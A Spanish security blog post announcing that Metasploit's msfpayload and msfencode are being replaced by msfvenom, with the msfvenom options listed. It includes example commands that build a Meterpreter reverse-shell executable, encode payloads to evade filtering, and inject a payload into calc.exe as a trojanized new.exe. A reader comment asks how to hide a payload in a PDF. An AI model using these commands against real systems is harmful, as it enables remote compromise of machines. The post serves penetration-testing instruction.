Tienda Wifi

Tienda Wifi
CiudadWireless es la tienda Wifi recomendada por elhacker.NET

Entradas Mensuales

Síguenos en:

Canal Oficial Telegram de elhacker.NET Grupo Facebook elhacker.NET Twitter elhacker.NET Canal Youtube elhacker.NET Comunidad Steam: Grupo elhacker.NET Mastodon

Entradas populares

PostHeaderIcon msfpayload y msfencode desaparecerán de Metasploit


Las herramientas msfpayload y msfencode de Metasploit desaparecerán, dejando paso a su sucesor msfvenomEl 8 de junio de 2015, el msfpayload  y msfencode se retirarán del repositorio de Metasploit. Metasploit es un “Framework” para realizar test de intrusión desarrollada por Rapid 7.





La herramienta msfvenom es la combinación de msfpayload y msfencode, y ha estado en las pruebas de más de 3,5 años. msfpayload y msfencode han estado en servicio a la comunidad de hacking durante casi 10 años

Metasploit incorpora un “set” de herramientas (exploits, scanners, payloads, etc) que cubren perfectamente todas las fases de un test de intrusión (pentest), desde la adquisición de información y reconocimiento, hasta el descubrimiento de vulnerabilidades, su explotación y post explotación.

En este documento vamos a intentar mostrar el funcionamiento de esta herramienta mediante la realización de ejemplos prácticos. Para la realización de dichos ejemplos, se empleará una distribución Linux llamada “Kali Linux” o su predecesora “BackTrack 5r3”.

A día de hoy, Metasploit se considera la verdadera “navaja suiza del Pentester”.

Metasploit proporciona interfaces de línea de comandos, gráficas y web con más de 300 módulos de exploit a lo largo de una extensa variedad de programas, servicios y sistemas operativos.

Seguidamente podemos ir al directorio en el que se encuentra instalado Metasploit y ejecutar la consola basada en texto (msfconsole), la interfaz web (msfweb), o la interfaz gráfica (msfgui).

Metasploit consta de varias herramientas distintas:

  • msfconsole. Consola de Metasploit.
  • msfcli. Nos permite ejecutar módulos directamente sin entrar en la consola.
  • msfpayload. Para generar payloads.
  • msfencode. Permite codificar los payloads para quitar null bytes por ejemplo.
  • msfvenom. Combinación de msfpayload y msfencode en una sola herramienta.

msfvenom

 Parámetros.
    -p, --payload          Payload to use. Specify a '-' or stdin to use custom payloads  
    -l, --list      [module_type]   List a module type example: payloads, encoders, nops, all
    -n, --nopsled           Prepend a nopsled of [length] size on to the payload  
    -f, --format            Output format (use --help-formats for a list)  
    -e, --encoder    [encoder]      The encoder to use
    -a, --arch        The architecture to use  
        --platform        The platform of the payload  
    -s, --space             The maximum size of the resulting payload  
    -b, --bad-chars           The list of characters to avoid example: '\x00\xff'  
    -i, --iterations         The number of times to encode the payload  
    -c, --add-code            Specify an additional win32 shellcode file to include  
    -x, --template            Specify a custom executable file to use as a template  
    -k, --keep                      Preserve the template behavior and inject the payload as a new thread
    -o, --options                   List the payload's standard options
    -h, --help                      Show this message
        --help-formats              List available formats 
 Ejemplos:

./msfvenom -l payloads 
  Generating a windows/meterpreter/reverse_tcp:
./msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP -f exe  
 To generate a payload that avoids certain bad characters:
./msfvenom -p windows/meterpreter/bind_tcp -b '\x00'  
To generate a payload with a specific encoder, and then encode 3 times:

./msfvenom -p windows/meterpreter/bind_tcp -e x86/shikata_ga_nai -i 3 

Inject a payload to calc.exe, and save it as new.exe

./msfvenom -p windows/meterpreter/bind_tcp -x calc.exe -k -f exe > new.exe  

4 comentarios :

Unknown dijo...
Este comentario ha sido eliminado por el autor.
Unknown dijo...

por que no puedo usar el msfpayload?

Unknown dijo...

Hola que tal..!!!gracias por el blog, quería saber si es posible hacer lo mismo con un payload con formato pdf, quiero codificar un pdf, lo he intentado varias veces pero solo encuentro la sintaxis, de la versión anterior de kali, no encuentro para kali 2017, gracias por su ayuda..!!!saludos!!!

Unknown dijo...

Disculpa WeedmanOMG, que comente, me imagino que ya lo resolviste...
pero de todas maneras..el msfpayload quedó obsoleto, pero le reemplazó el msfvenom saludos!!!

Publicar un comentario

Los comentarios pueden ser revisados en cualquier momento por los moderadores.

Serán publicados aquellos que cumplan las siguientes condiciones:
- Comentario acorde al contenido del post.
- Prohibido mensajes de tipo SPAM.
- Evite incluir links innecesarios en su comentario.
- Contenidos ofensivos, amenazas e insultos no serán permitidos.

Debe saber que los comentarios de los lectores no reflejan necesariamente la opinión del STAFF.